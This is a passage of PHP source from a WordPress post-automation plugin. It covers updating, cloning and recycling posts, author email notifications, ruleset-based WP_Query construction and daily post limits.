					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, rule triggered: %s replaced by %s. Returning [%s]'  ), __FUNCTION__, $for, $spinrule[0], $replace, htmlentities( $result) ) );
				$the_data = $result;
			}
			else {
				if ( $this->getOption( 'DebugMode' ) === 'on' )
					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, no match found.'  ), __FUNCTION__, $for ) );
			}
		}
		return trim( $the_data );
	}

	private function emailNotification( $postID, $rulesetID, $data ) {
		$post_author_id = get_post_field( 'post_author', $postID );
		$email = get_the_author_meta( 'user_email', $post_author_id ); 
		if ( is_email( $email ) ) {
			$author_name = get_the_author_meta( 'display_name', $post_author_id );
			$from = get_bloginfo( 'admin_email' );
			$subject = sprintf( esc_html__( 'WP Auto Poster made changes to your post on %s.'  ), get_bloginfo( 'name' ) );
			$headers = 'From: ' . $from . "\r\n";
			$headers .= 'Reply-To: ' . $from . "\r\n";
			$permalink = get_permalink( $postID );
			$message = sprintf( esc_html__( 'Post: %s'  ), $permalink );
			$message .= "\r\n" . sprintf( esc_html__( 'Author: %s'  ), $author_name );
			$message .= "\r\n\r\n" . $data;
			require_once( ABSPATH . WPINC . '/pluggable.php' );
			if ( wp_mail( $email, $subject, $message, $headers ) ) 
				$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, Email sent to post author %s about post changes.'  ), $rulesetID, $email ) );
			else
				$this->addLogMessage( sprintf( esc_html__( 'WAP Error: Ruleset #%s, Unable to send email to post author %s about post changes.'  ), $rulesetID, $email ) );
		}
		else
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error: Ruleset #%s, post author email %s not valid.'  ), $rulesetID, $email ) );
	}


	/**
	 * All common checks and balances when updating a post
	 */
	private function updatePost( $post, $rulesetID, $max_per_day, &$posts_today, $today, $recycleMode = 'None', $num = 0 ) {
		// check Max Posts per Day, again. Ignore if post was just recycled.
		if ( $recycleMode === 'None' 
			&& ! $max_per_day
			&& true === $this->reachedMaxPerDay( $rulesetID, $max_per_day, $posts_today, $today ) 
		) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s max per day reached.'  ), __FUNCTION__ ) );
			return;
		}

		$changed = array();
		
		// Post Action: clone?
		$clonePost = $this->getRulesetOption( $rulesetID, 'ClonePost', false );
		if ( true == $clonePost ) {
			$new_post_id = $this->clonePost( $post, $rulesetID );
			if ( ! $new_post_id ) {
				return null;
			}
			$old_post_id = $post->ID;
			$post = get_post( $new_post_id );
		}

		$args = array(
			'ID' => $post->ID 
		);

		// Post Action: set sticky
		$setPostSticky = $this->getRulesetOption( $rulesetID, 'SetPostSticky', 0 );
		if ( $setPostSticky === 'Stick' ) {
			stick_post( $post->ID );
			$changed[] = esc_html__( 'stickied'  );
		} else if ( $setPostSticky === 'Unstick' ) {
			unstick_post( $post->ID );
			$changed[] = esc_html__( 'unstickied'  );
		}
		
		// Post Action: set post type
		$setPostType = $this->getRulesetOption( $rulesetID, 'SetPostType', 0 );
		if ( $setPostType ) {
			$args[ 'post_type' ] = $setPostType;
			$changed[]           = esc_html__( 'post type set to '  ) . strtoupper( $setPostType );
		}
		
		// Post Action: set post status
		$setPostStatus = $this->getRulesetOption( $rulesetID, 'SetPostStatus', 0 );
		if ( $setPostStatus && $setPostStatus !== 'inherit' ) {
			$changed[]             = esc_html__( 'post status set to '  ) . strtoupper( $setPostStatus );
			$args[ 'post_status' ] = $setPostStatus;
		}

		// Post Action: set post date
		$setPostDate = $this->getRulesetOption( $rulesetID, 'SetPostDate', 0 );
		if ( $setPostDate ) {
			if ( $setPostDate === 'Keep Time' ) {
				$args[ 'post_date' ] = $post->post_date;
				$args[ 'post_date_gmt' ] = $post->post_date_gmt;
				$changed[]             = esc_html__( 'post date kept at: '  ) . $post->post_date;
			}
			else if ( $setPostDate === 'Current Time' ) {
				$args[ 'post_date' ] = current_time( "mysql" );
				$args[ 'post_date_gmt' ] = get_gmt_from_date( $args[ 'post_date' ] );
				$changed[]             = esc_html__( 'post date set to '  ) . $args[ 'post_date' ];
				$changed[]             = esc_html__( 'post date gmt set to '  ) . $args[ 'post_date_gmt' ];
			}
		}
		
		// Post Action: set post author
		$setPostAuthor = $this->getRulesetOption( $rulesetID, 'SetPostAuthor', 0 );
		if ( $setPostAuthor ) {
			$args[ 'post_author' ] = $setPostAuthor;
			$changed[]             = esc_html__( 'post author set to '  ) . strtoupper( get_the_author_meta( 'display_name', $setPostAuthor ) ) . " (user_id {$setPostAuthor})";
		}

		// Post Action: find and replace
		$findreplace = $this->getRulesetOption( $rulesetID, 'FindReplace', array() );
		if ( ! empty( $findreplace ) ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, Find/Replace rules detected: %s'  ), __FUNCTION__, htmlentities( print_r( $findreplace, true ) ) ) );
			$customfindreplace = $this->getRulesetOption( $rulesetID, 'CustomFindReplace', array() );
			$fr_title = $fr_content = $fr_excerpt = false;
			$collapsed = $this->collapseCheckboxes( $customfindreplace );
			foreach ( $collapsed as $key => $value ) {
				if ( $key === 0 && $value === 'on' ) {
					$fr_title = true;
				}
				else if ( $key === 1 && $value === 'on' ) {
					$fr_content = true;
				}
				else if ( $key === 2 && $value === 'on' ) {
					$fr_excerpt = true;
				}
			}
			if ( $fr_title === false	// if nothing is limited, then all are true
					&& $fr_content === false
					&& $fr_excerpt === false ) {
				$fr_title = $fr_content = $fr_excerpt = true;
			}

			if ( $fr_title === true ) {
				$new_title = $this->findReplace( $findreplace, $post->post_title, 'title' );
				if ( $new_title != $post->post_title ) {
					$args[ 'post_title' ] = $new_title;
					$changed[]             = esc_html__( 'find/replace: post title set to '  ) . '[' . $new_title . ']';
					$args[ 'post_name' ] = ''; // WP will make new slug
				}
			}
			if ( $fr_content === true ) {
				$new_content = $this->findReplace( $findreplace, $post->post_content, 'content' );
				if ( $new_content != $post->post_content ) {
					$args[ 'post_content' ] = $new_content;
					$changed[]             = esc_html__( 'find/replace: post content set to '  ) . '[' . $new_content . ']';
				}
			}
			if ( $fr_excerpt === true ) {
				$new_excerpt = $this->findReplace( $findreplace, $post->post_excerpt, 'excerpt' );
				if ( $new_excerpt != $post->post_excerpt ) {
					$args[ 'post_excerpt' ] = $new_excerpt;
					$changed[]             = esc_html__( 'find/replace: post excerpt set to '  ) . '[' . $new_excerpt . ']';
				}
			}
		}
		
		$args = apply_filters( $this->getPluginTextDomain() . '-update-post', $args, $post, $rulesetID );
		
		if ( empty( $changed ) ) {
			if ( $recycleMode === 'None' ) {
				$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, %s post id %s, title: %s - no change'  ), $rulesetID, $post->post_status, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $post->post_title ) );
			}
		}
		else {

		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, query result %d, args for wp_update_post are: %s'  ), __FUNCTION__, $num, htmlentities( print_r( $args, true ) ) ) );
		
		// use kses functions so WordPress doesn't strip out suspicious code like iframes
		kses_remove_filters();
		$result = wp_update_post( $args ); 
		kses_init_filters();

		if ( is_wp_error( $result ) )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - Ruleset #%s, wp_update_post returned %s.'  ), $rulesetID, $result->get_error_message() ) );
		else {
			$what_changed = implode( ', ', $changed );
			$permalink = get_permalink( $post->ID );
			$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, %s post id %s, title: %s - %s'  ), $rulesetID, $post->post_status, "<a target='_blank' href='" . $permalink . "'>" . $post->ID . "</a>", $post->post_title, $what_changed ) );
		}

		$notify_author = $this->getRulesetOption( $rulesetID, 'PostActionNotify', '' );
		if ( $notify_author === 'on' )
			$this->emailNotification( $post->ID, $rulesetID, $what_changed );

		// don't check max posts per day if post was recycled.
		if ( $recycleMode === 'None' && $max_per_day ) {
			$posts_today++;
			set_transient( $this->getPluginTextDomain() . '-posts-today-ruleset-' . $rulesetID, "{$today},{$posts_today}", DAY_IN_SECONDS );
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, posts per day: %s out of %s max'  ), $rulesetID, $posts_today, $max_per_day ) );
		}

		} // end if else things changed
		
		// now update any taxonomies on post
		$useTaxonomies = $this->getOption( 'UseTaxonomies', array ());
		foreach ( $useTaxonomies as $key => $useTaxonomy ) {
			$action = $this->getRulesetOption( $rulesetID, 'Action-' . $useTaxonomy, null );
			$terms  = $this->getRulesetOption( $rulesetID, 'Change-' . $useTaxonomy, null );
			$terms  = apply_filters( $this->getPluginTextDomain() . '-set-post-terms', $terms, $post, $rulesetID );
			
			if ( empty( $terms ) )
				continue;
			
			$terms     = array_map( 'intval', $terms ); // make sure ints or bad things happen
			$termnames = array();
			foreach ( $terms as $term ) { // get term names for human readable log msg
				$obj = get_term_by( 'id', $term, $useTaxonomy );
				if ( isset( $obj->name ) )
					$termnames[] = $obj->name;
			}
			
			if ( $action === 'Add' ) {
				$result = wp_set_object_terms( $post->ID, $terms, $useTaxonomy, true );
				if ( is_wp_error( $result ) )
					$this->addLogMessage( sprintf( esc_html__( 'WAP Error - Ruleset #%s, post id %s wp_set_object_terms ( %s => %s ) returned %s.'  ), $rulesetID, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $useTaxonomy, print_r( $termnames, true ), $result->get_error_message() ) );
				else
					$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, post id %s taxonomy terms were added ( %s => %s ).'  ), $rulesetID, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $useTaxonomy, print_r( $termnames, true ) ) );
			} else if ( $action === 'Delete' ) {
				$result = wp_remove_object_terms( $post->ID, $terms, $useTaxonomy );
				if ( is_wp_error( $result ) )
					$this->addLogMessage( sprintf( esc_html__( 'WAP Error - Ruleset #%s, post id %s wp_remove_object_terms ( %s => %s ) returned %s.'  ), $rulesetID, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $useTaxonomy, print_r( $termnames, true ), $result->get_error_message() ) );
				else
					$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, post id %s taxonomy terms were deleted ( %s => %s ).'  ), $rulesetID, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $useTaxonomy, print_r( $termnames, true ) ) );
			} else if ( $action === 'Replace' ) {
				$result = wp_set_object_terms( $post->ID, $terms, $useTaxonomy, false );
				if ( is_wp_error( $result ) )
					$this->addLogMessage( sprintf( esc_html__( 'WAP Error - Ruleset #%s, post id %s wp_set_object_terms ( %s => %s ) returned %s.'  ), $rulesetID, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $useTaxonomy, print_r( $termnames, true ), $result->get_error_message() ) );
				else
					$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, post id %s taxonomy terms were replaced with ( %s => %s ).'  ), "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $post->ID, $useTaxonomy, print_r( $termnames, true ) ) );
			}
		}

		$sleepDelay = $this->getOption( 'SleepDelay', 1 );
		sleep( $sleepDelay );
		
		do_action( $this->getPluginTextDomain() . '-post-updated', $post->ID, $rulesetID );
	}
	
	/**
	 * Clone a post
	 * adapted from https://kinsta.com/knowledgebase/duplicate-page-post-wordpress/#custom-plugin
	 */
	private function clonePost( $post, $rulesetID ) {
		global $wpdb;

		// args for new post
		$args = array(
 			'comment_status' => $post->comment_status,
			'ping_status'    => $post->ping_status,
			'post_author'    => $post->post_author,
			'post_content'   => $post->post_content,
			'post_excerpt'   => $post->post_excerpt,
			'post_name'      => $post->post_name,
			'post_parent'    => $post->post_parent,
			'post_password'  => $post->post_password,
			'post_status'    => 'draft',
			'post_title'     => $post->post_title,
			'post_type'      => $post->post_type,
			'to_ping'        => $post->to_ping,
			'menu_order'     => $post->menu_order
		);

		$args = apply_filters( $this->getPluginTextDomain() . '-clone-post', $args, $post->ID, $rulesetID );
		if ( empty( $args ) ) 	// user abort
			return null;

		// insert the new post
		$new_post_id = wp_insert_post( $args, true );

		if ( is_wp_error( $new_post_id ) ) {
			$this->addLogMessage( sprintf( esc_html__( 'WAP Clone Error - Ruleset #%s, wp_insert_post returned %s.'  ), $rulesetID, $new_post_id->get_error_message() ) );
			return null;
		}

		// add taxonomy terms to the new post
		$taxonomies = get_object_taxonomies( $post->post_type );
		foreach ( $taxonomies as $taxonomy ) {
			$post_terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'slugs' ) );
			wp_set_object_terms( $new_post_id, $post_terms, $taxonomy, false );
		}

		// duplicate all post meta
		$post_meta = get_post_meta( $post->ID );
		if( $post_meta ) {

			foreach ( $post_meta as $meta_key => $meta_values ) {

				if( '_wp_old_slug' == $meta_key ) { // do nothing for this meta key
					continue;
				}

				foreach ( $meta_values as $meta_value ) {
					add_post_meta( $new_post_id, $meta_key, $meta_value );
				}
			}
		}

/* DEPRECATED in v1.7:
		// use SQL queries to duplicate postmeta
		$post_metas = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post->ID");
		if ( count( $post_metas )!=0 ) {
			$sql_query = "INSERT INTO $wpdb->postmeta ( post_id, meta_key, meta_value ) ";
			foreach ( $post_metas as $post_meta ) {
				$meta_key = $post_meta->meta_key;
				if( $meta_key == '_wp_old_slug' ) continue;
				$meta_value = addslashes( $post_meta->meta_value);
				$sql_query_sel[]= "SELECT $new_post_id, '$meta_key', '$meta_value'";
			}
			$sql_query.= implode(" UNION ALL ", $sql_query_sel);
			$wpdb->query( $sql_query );
		}
*/

		// now clone comments
		$args = array(
			'post_id'	=> $post->ID
		);
		$comment_query = new WP_Comment_Query;
		$comments = $comment_query->query( $args );
		if ( $comments ) {
			foreach ( $comments as $comment ) {
				$data = array(
					'comment_post_ID' => $new_post_id,
					'comment_author' => $comment->comment_author,
					'comment_author_email' => $comment->comment_author_email,
					'comment_author_url' => $comment->comment_author_url,
					'comment_author_IP' => $comment->comment_author_IP,
					'comment_date' => $comment->comment_date,
					'comment_date_gmt' => $comment->comment_date_gmt,
					'comment_content' => $comment->comment_content,
					'comment_karma' => $comment->comment_karma,
					'comment_approved' => $comment->comment_approved,
					'comment_agent' => $comment->comment_agent,
					'comment_type' => $comment->comment_type,
					'comment_parent' => $comment->comment_parent,
					'user_id' => $comment->user_id,
				);
				wp_insert_comment( $data );
			}
		}

		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, %s post id %s CLONED into post id %s. Title: %s.'  ), $rulesetID, $post->post_status, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", "<a target='_blank' href='" . get_post_permalink( $new_post_id ) . "'>" . $new_post_id . "</a>", $post->post_title ) );

		return $new_post_id;
	}

	/**
	 * All common checks and balances when recycling a post
	 */
	private function recyclePost( $post, $rulesetID, $max_per_day, &$posts_today, $today, $recycleMode, $num ) {
		if ( ! $post ) {
			return;
		}
		// check Max Posts per Day, again
		if ( true === $this->reachedMaxPerDay( $rulesetID, $max_per_day, $posts_today, $today ) )
			return;
		
		$noRecycleHooks = $this->getRulesetOption( $rulesetID, 'NoRecycleHooks', '' );
		
		// recycle mode - save post as draft to trigger publish hooks when published
		if ( $noRecycleHooks !== 'on' ) {
			// save the published post as draft, so publishing it again triggers hooks!
			$args = array(
				'ID' => $post->ID,
				'post_status' => 'draft' 
			);
			$args = apply_filters( $this->getPluginTextDomain() . '-draft-post', $args );
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, query result %d, args for wp_update_post are: %s'  ), __FUNCTION__ . '*', $num, htmlentities( print_r( $args, true ) ) ) );
			kses_remove_filters();
			$result = wp_update_post( $args, true );
			kses_init_filters();
			if ( is_wp_error( $result ) ) {
				$this->addLogMessage( sprintf( esc_html__( 'WAP Recycle Error - Ruleset #%s, wp_update_post* returned %s.'  ), $rulesetID, $result->get_error_message() ) );
				return;
			}
			sleep( $sleepDelay );
		}
		
		$args = array(
			'ID' => $post->ID,
			'post_status' => 'publish',
			'post_date' => current_time( "mysql" ) 
		);
		
		$recycleTimes = get_post_meta( $post->ID, '_wap_recycled', true );
		
		$originalPublish = $this->getRulesetOption( $rulesetID, 'OriginalPublish', 'None' );
		if ( $originalPublish != 'None' && !$recycleTimes ) {
			$text = $this->getRulesetOption( $rulesetID, 'OriginalPublishText', 'None' );
			$args = $this->recycleOriginalPublishNote( $args, $post, $originalPublish, $text );
		}
		
		$args = apply_filters( $this->getPluginTextDomain() . '-recycle-post', $args, $post, $rulesetID );
		
		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, query result %d, args for wp_update_post are: %s'  ), __FUNCTION__, $num, htmlentities( print_r( $args, true ) ) ) );
		
		// use kses functions so WordPress doesn't strip out suspicious code like iframes
		kses_remove_filters();
		// Note: wp_publish_post() does not update the publish date! using wp_update_post instead!
		$result = wp_update_post( $args, true );
		kses_init_filters();
		
		if ( is_wp_error( $result ) )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Recycle Error - Ruleset #%s, wp_update_post returned %s.'  ), $rulesetID, $result->get_error_message() ) );
		else {
			sleep( $sleepDelay );
			$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, %s post id %s RECYCLED. Title: %s.'  ), $rulesetID, $post->post_status, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $post->post_title ) );
		}

		$notify_author = $this->getRulesetOption( $rulesetID, 'PostRecycleNotify', '' );
		if ( $notify_author === 'on' ) {
			$what_changed = esc_html__( 'Post has been recycled.'  );
			$this->emailNotification( $post->ID, $rulesetID, $what_changed );
		}

		if ( $max_per_day ) {
			$posts_today++;
			set_transient( $this->getPluginTextDomain() . '-posts-today-ruleset-' . $rulesetID, "{$today},{$posts_today}", DAY_IN_SECONDS );
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, posts per day: %s out of %s max'  ), $rulesetID, $posts_today, $max_per_day ) );
		}

		$recycleTimes = empty( $recycleTimes ) ? 1 : $recycleTimes + 1;
		update_post_meta( $post->ID, '_wap_recycled', $recycleTimes );
			
		do_action( $this->getPluginTextDomain() . '-post-recycled', $post->ID, $rulesetID );

		$force_post_actions = $this->getRulesetOption( $rulesetID, 'PostRecycleForceActions', '' );
		if ( $force_post_actions === 'on' ) {
			$this->updatePost( $post, $rulesetID, $max_per_day, $posts_today, $today, $recycleMode, $num );
		}
	}


	/**
	 * Convert relative Post Age to something WordPress wp_query will recognize
	 * @return array of date_query or null.
	 */
	private function getDateQuery( $date_query, $age, $period, $type ) {
		$dq = true === is_numeric( $age ) ? $age . ' days ago' : $age;
		if ( strtotime( $dq ) === false ) {
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error: %s "%s" not recognized by strtotime function. Ignored.'  ), $type, $age ) );
		}
		else {
			$date_query = array_merge( $date_query, array(
				$period => $dq
			) );
		}
		return $date_query;
	}
	
	
	/**
	 * Ruleset triggered to check all rules and process
	 * @param $rulesetID number of the ruleset triggered
	 * @return array of WP_Post Objects found
	 */
	private function queryRulesetPosts( $rulesetID, $recycleMode = 'None' ) {
		$ruleset = $this->getRuleset( $rulesetID );
		
		// set default args for WP_Query
		$args = array(
			'posts_per_page' 		=> $this->getRulesetOption( $rulesetID, 'MaxNumberPosts', 1 ),
			'meta_query'			=> array(),
                        'no_found_rows'         	=> true,	// don't need pagination
                        'cache_results'         	=> false,	// don't need posts cached
                        'update_post_meta_cache' 	=> false,	// don't need meta cached
                        'update_post_term_cache' 	=> false,	// don't need terms cached
		);
		
		// note: ignore only works on post type 'post' because only 'post' supports it.
		$ignore_sticky_posts = $this->getRulesetOption( $rulesetID, 'IgnoreStickies', 'on' );
		if ( $ignore_sticky_posts === 'on' )
			$args[ 'ignore_sticky_posts' ] = true;
		
		
		$suppress_filters = $this->getRulesetOption( $rulesetID, 'SuppressFilters', 'on' );
		if ( $suppress_filters === 'on' )
			$args[ 'suppress_filters' ] = true;
		
		$post_types = $this->getRulesetOption( $rulesetID, 'LimitPostTypes', null );
		if ( $post_types )
			$args[ 'post_type' ] = $post_types;
		
		if ( $recycleMode != 'None' )
			$post_statuses = 'publish';
		else
			$post_statuses = $this->getRulesetOption( $rulesetID, 'LimitPostStatuses', null );
		
		if ( $post_statuses )
			$args[ 'post_status' ] = $post_statuses;
		else {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, no post statuses selected. Skipping query.'  ), __FUNCTION__ ) );
			return array(); // no post statuses set = no eligible posts
		}
		
		$post_authors = $this->getRulesetOption( $rulesetID, 'LimitPostAuthors', null );
		if ( $post_authors )
			$args[ 'author' ] = implode( ',', $post_authors );
		
		$useTaxonomies = $this->getOption( 'UseTaxonomies', array ());
		$tax_queries   = array();
		foreach ( $useTaxonomies as $key => $useTaxonomy ) {
			$terms = $this->getRulesetOption( $rulesetID, $useTaxonomy, null );
			if ( $terms && $useTaxonomy === 'category' )
				$args[ 'category__in' ] = $terms;
			else if ( $terms && $useTaxonomy === 'post_tag' )
				$args[ 'tag__in' ] = $terms;
			else if ( $terms )
				$tax_queries[] = array(
					'taxonomy' => $useTaxonomy,
					'field' => 'term_id',
					'terms' => $terms 
				);
		}
		// NOTE: If 'tax_query' is set for a query, the default post_type becomes 'any'. 
		if ( !empty( $tax_queries ) ) {
			$tax_queries[]       = array(
				'relation' => 'AND' 
			);
			$args[ 'tax_query' ] = $tax_queries;
		}
		
		$post_search = $this->getRulesetOption( $rulesetID, 'LimitPostSearch', null );
		if ( $post_search )
			$args[ 's' ] = stripslashes( $post_search );
		
		$post_IDs = $this->getRulesetOption( $rulesetID, 'LimitPostIDs', null );
		if ( $post_IDs ) {
			$post_IDs_a = explode( ',',  $post_IDs );
			$post_IDs_a = array_filter( $post_IDs_a, 'is_numeric' );
			$posIDs = array_filter( $post_IDs_a, function( $v ) {
				return $v > 0;
			});
			$negIDs = array_map( 'abs', array_filter( $post_IDs_a, function( $v ) {
				return $v < 0;
			}));
			if ( ! empty( $posIDs ) )
				$args[ 'post__in' ] = $posIDs;
			if ( ! empty( $negIDs ) ) {
				$args[ 'post__not_in' ] = $negIDs;
			}
		}
		
		$featured = $this->getRulesetOption( $rulesetID, 'LimitFeaturedImages', null );
		if ( $featured === 'Has' )
			$args[ 'meta_query' ] = array_merge( $args[ 'meta_query'],
				array( array(
					'key'	=> '_thumbnail_id'
				) )
			);
		else if ( $featured === 'Missing' )
			$args[ 'meta_query' ] = array_merge( $args[ 'meta_query'],
				array( array(
					'key'	=> '_thumbnail_id',
					'compare'	=> 'NOT EXISTS'
				) )
			);
		
		$date_query = array();

		if ( $recycleMode != 'None' ) {
			$orderby = $recycleMode;
			$minAge  = $this->getRulesetOption( $rulesetID, 'MinRecycleAge', 0 );
			$maxAge  = $this->getRulesetOption( $rulesetID, 'MaxRecycleAge', 0 );
			if ( $minAge ) {
				$date_query = $this->getDateQuery( $date_query, $minAge, 'before', 'Minimum Recycle Age' );
			}
			if ( $maxAge ) {
				$date_query = $this->getDateQuery( $date_query, $maxAge, 'after', 'Maximum Recycle Age' );
			}
			$maxRecycleTimes = $this->getRulesetOption( $rulesetID, 'MaxRecycleTimes', 0 );
			if ( $maxRecycleTimes ) {
				$args[ 'meta_query' ] = array_merge( $args[ 'meta_query' ],
					array(
					'relation' => 'OR',
					array(
						'key' => '_wap_recycled',
						'value' => $maxRecycleTimes,
						'compare' => '<' 
					),
					array(
						'key' => '_wap_recycled',
						'value' => '',
						'compare' => 'NOT EXISTS' 
					) 
					)
				);
			}
		} else {
			$minAge     = $this->getRulesetOption( $rulesetID, 'MinPostAge', 0 );
			$maxAge     = $this->getRulesetOption( $rulesetID, 'MaxPostAge', 0 );
			if ( $minAge ) {
				$date_query = $this->getDateQuery( $date_query, $minAge, 'before', 'Minimum Post Age' );
			}
			if ( $maxAge ) {
				$date_query = $this->getDateQuery( $date_query, $maxAge, 'after', 'Maximum Post Age' );
			}
			$orderby = $this->getRulesetOption( $rulesetID, 'QueryOrderBy', 'Oldest' );
		}
		
		if ( $orderby === 'CommentCount' ) {
			$args[ 'order' ]   = 'DESC';
			$args[ 'orderby' ] = 'comment_count';
		} else if ( $orderby === 'Oldest' ) {
			$args[ 'order' ]   = 'ASC';
			$args[ 'orderby' ] = 'date';
		} else if ( $orderby === 'Newest' ) {
			$args[ 'order' ]   = 'DESC';
			$args[ 'orderby' ] = 'date';
		} else if ( $orderby === 'Random' ) {
			$args[ 'order' ]   = 'DESC';
			$args[ 'orderby' ] = 'rand';
		} else if ( $orderby === 'SearchRelevance' ) {
			$args[ 'order' ]   = 'DESC';
			$args[ 'orderby' ] = 'relevance';
		}
		// recycle mode only:
		else if ( $orderby === 'Daily' ) {
			$args[ 'order' ] = 'ASC';
			$today           = getdate();
			$date_query      = array_merge( $date_query, array(
				'year' 	=> $today[ 'year' ],
				'month'	=> $today[ 'month' ],
				'day' 	=> $today[ 'day' ]
			) );
		}
		else if ( $orderby === 'Weekly' ) {
			$args[ 'order' ] = 'ASC';
			$today           = getdate();
			$date_query      = array_merge( $date_query, array(
				'dayofweek_iso' => $today[ 'wday' ] 
			) );
			if ( !$minAge ) // make sure not to include today 
				$date_query = array_merge( $date_query, array(
					'before' => '1 days ago' 
				) );
		}
		else if ( $orderby === 'Monthly' ) {
			$args[ 'order' ] = 'ASC';
			$today           = getdate();
			$date_query      = array_merge( $date_query, array(
				'day' => $today[ 'mday' ] 
			) );
			if ( !$minAge ) // make sure not to include today 
				$date_query = array_merge( $date_query, array(
					'before' => '1 days ago' 
				) );
		}
		else if ( $orderby === 'OTD' ) {
			$args[ 'order' ] = 'ASC';
			$today           = getdate();
			$date_query      = array_merge( $date_query, array(
				'month' => $today[ 'mon' ],
				'day' => $today[ 'mday' ] 
			) );
			if ( !$minAge ) // make sure not to include today
				$date_query = array_merge( $date_query, array(
					'before' => '1 days ago' 
				) );
		}
		
		if ( !empty( $date_query ) )
			$args[ 'date_query' ] = $date_query;

		if ( empty( $args['meta_query'] ) ) 
			unset( $args['meta_query'] );

		$customSearch = $this->getRulesetOption( $rulesetID, 'CustomSearch', array() );
		$collapsed = $this->collapseCheckboxes( $customSearch );
		foreach ( $collapsed as $key => $value ) {
			if ( $key === 0 && $value === 'on' ) {
				$args[ 'wap_search' ][] = 'title';
			}
			else if ( $key === 1 && $value === 'on' ) {
				$args[ 'wap_search' ][] = 'content';
			}
			else if ( $key === 2 && $value === 'on' ) {
				$args[ 'wap_search' ][] = 'excerpt';
			}
			else if ( $key === 3 && $value === 'on' ) {
				$args[ 'wap_search' ][] = 'fields';
			}
		}

		$args = apply_filters( $this->getPluginTextDomain() . '-query-posts', $args, $rulesetID );
		
		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, args for WP_Query are: %s'  ), __FUNCTION__, print_r( $args, true ) ) );
		
		// give user a chance to use own custom code to order post
		$posts = apply_filters( $this->getPluginTextDomain() . '-wp-query-posts', null, $args, $rulesetID );
		if ( ! is_array( $posts ) ) {
			$query = new WP_Query( $args );
			$posts = isset( $query->posts ) ? $query->posts : array();
		}
		
		if ( $this->getOption( 'DebugMode' ) === 'on' ) {
			if ( $args[ 'posts_per_page' ] <= 1 )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, results from WP_Query are: %s'  ), __FUNCTION__, htmlentities( print_r( $posts, true ) ) ) );
			else
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, found %s results from WP_Query'  ), __FUNCTION__, $query->post_count ) );
		}
		
		$type = $recycleMode != 'None' ? 'recyclable' : 'eligible';
		if ( empty( $posts ) )
			$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, WP_Query did not return any %s posts.'  ), $rulesetID, $type ) );
		
		return $posts;
	}
	
	/**
	 * Check max per day limit using transient.
	 * @param $rulesetID number of the ruleset to be checked
	 * @param $max_per_day number of the option 'Max Posts Per Day'
	 * @param $posts_today number of posts published by this ruleset today
	 * @param $today number of the day of the month
	 */
	private function reachedMaxPerDay( $rulesetID, $max_per_day, &$posts_today, $today ) {
		
		if ( !$max_per_day ) // no limit
			return false;
		
		$pToday = get_transient( $this->getPluginTextDomain() . '-posts-today-ruleset-' . $rulesetID );
		
		if ( $pToday ) {
			// transient in format 'day of month, number of posts'
			list( $tdate, $posts_today ) = explode( ',', $pToday );
			if ( $today != $tdate )
				$posts_today = 0; // new day, start count over
			if ( $posts_today >= $max_per_day ) {
				$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, reached %s maximum number of posts for today.'  ), $rulesetID, $max_per_day ) );
				return true;
			}
		}
		
		return false;
	}
	
	/**
	 * Check if Inclusion/Exclusion date rules pass current date/time
	 * @param $dateRules string a comma delimited entry for specific date/times
	 * @param $inclusion boolean whether this is an Inclusion rule (true) or Exclusion rule (false)
	 * @return boolean if this rule passes or fails
	 */
	private function passedDateRules( $dateRules, $type ) {
		if ( empty( $dateRules ) )
			return true;
		
		$checkTime = current_time( "timestamp" );
		
		$dates     = explode( ',', $dateRules );
		
		$passed = true;
		
		foreach ( $dates as $date ) {

			$date = trim( $date );
